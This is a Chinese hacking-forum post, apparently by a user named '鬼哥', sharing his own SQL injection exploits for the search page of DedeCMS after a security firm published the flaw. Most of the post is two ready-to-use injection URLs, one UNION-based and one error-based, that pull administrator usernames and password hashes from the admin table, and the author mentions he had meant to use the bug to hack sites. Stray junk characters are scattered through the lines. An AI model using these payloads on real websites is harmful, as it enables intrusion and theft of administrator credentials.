转载不加作者名的没JJ
+ o9 Q2 f% w0 F; s. k6 V1 O& t Q5 V; |/ v& Z) v3 a6 f
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。2 X% l: R- E/ ~% b8 x
$ M! P, Z2 `/ Z7 D7 a9 k% ?) t
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。. k3 y0 S% \' f6 n
' z3 q( U- n# ~+ c- P5 I, ?; ^
我一般是这样测试的:8 E4 E$ V1 R, a, U0 r6 e
9 G! V# u3 w( D$ [/ F5 P1 [5 A提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a: [7 ~5 I! H8 `: z* P3 k
0 h b. \6 U9 p2 n% B
转载不加作者名的没JJ
' a* S# Y8 ?) x5 R0 g% F) }! @5 Z( g a, ?- c
作者:鬼哥. k' ]. d$ ^/ e1 L& c) c$ y
$ i8 s6 w0 \ b' Y9 ^ l1 s) l
6 T- Y; D& _! P X; i# z9 B( {# b
- o8 o2 z! ^! G9 K看结果如果提示4 b' `/ u& q. `, Z) _$ H( f( v4 S! L
- F% M% o, M7 o5 G5 e4 Y; u- Y3 `Safe Alert: Request Error step 2 !8 C8 O" B% W+ _9 I/ M' U& z8 g9 B: Y
' H. U9 A! x/ x+ b$ R7 z
那么直接用下面的exp) }% T& @' i' u2 {
- V' S- W) q7 p8 }& P7 w k. J& I% j
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a9 E+ g% K3 i* s5 Y( I
$ p* D0 J9 E& b6 m* Q3 }" y4 n( m8 x
$ Y9 A& x/ Q6 Y% V' y看结果如果提示
+ T) n j9 | V9 l! W6 q( q2 \5 {& F! e5 ~
Safe Alert: Request Error step 1 !! l: \2 e% F& l9 y7 D8 c+ a2 ]
i" l( Y2 c5 C* v7 N- S
那么直接用下面的exp
: S: E+ }- P% U% t/ I/ z- }, a
) T4 W' |3 G9 p9 R2 |xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
, m; d6 Y- A" Z! d: a
( i7 M& t0 E$ g$ r/ Q- K$ `1 F; h; c
如果正常显示证明漏洞不存在了。
% H3 b# C0 b' K( L3 Z/ @9 P+ J1 ?) g P8 i3 f4 ~. u
转载不加作者名的没JJ |